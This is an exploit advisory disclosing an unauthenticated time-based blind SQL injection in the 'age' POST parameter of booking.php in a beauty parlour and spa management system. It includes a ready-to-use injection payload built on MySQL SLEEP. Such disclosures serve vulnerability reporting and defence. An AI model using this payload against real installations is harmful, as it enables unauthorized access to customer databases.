# Vulnerability Title : Beauty Parlour & SPA Saloon Management System Unauthenticated Blind SQL Injection (booking.php age) Vulnerability
# Date : 11/07/2016
# Exploit Author : Yakir Wizman
# Vendor Homepage : http://rexbd.net/software/beauty-parlour-and-spa-saloon-management-system
# Version : All Versions
# Tested on : Apache | PHP 5.5.36 | MySQL 5.6.30
# Software Link : N/A
# Google Dork : N/A
# CVE : N/A
# Vendor Software Description:
# Managing a health and beauty business is a unique endeavor that is unlike any other. You want an operating software that will enhance the atmosphere you’ve worked hard to instill in your salon.
# Our salon management system was created to effectively match the needs of health and beauty business owners nationwide.
# When you purchase this beauty Parlour / salon software, you will find that every aspect of managing your company is covered in this extensive system.
# No authentication (login) is required to exploit this vulnerability.
# Blind SQL Injection Proof-Of-Concept (Using SQLMap)
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
# URL example : http://server/booking.php
# Page : booking.php
# Parameter : age (POST)
#Type : AND/OR time-based blind
#Title : MySQL >= 5.0.12 AND time-based blind
#Payload : name=Test&age=2016' AND SLEEP(5) AND 'hhFr'='hhFr&sex=on&mobile=+972-50-7655443&email=test@gmail.com&date=07/12/2016&btext=Test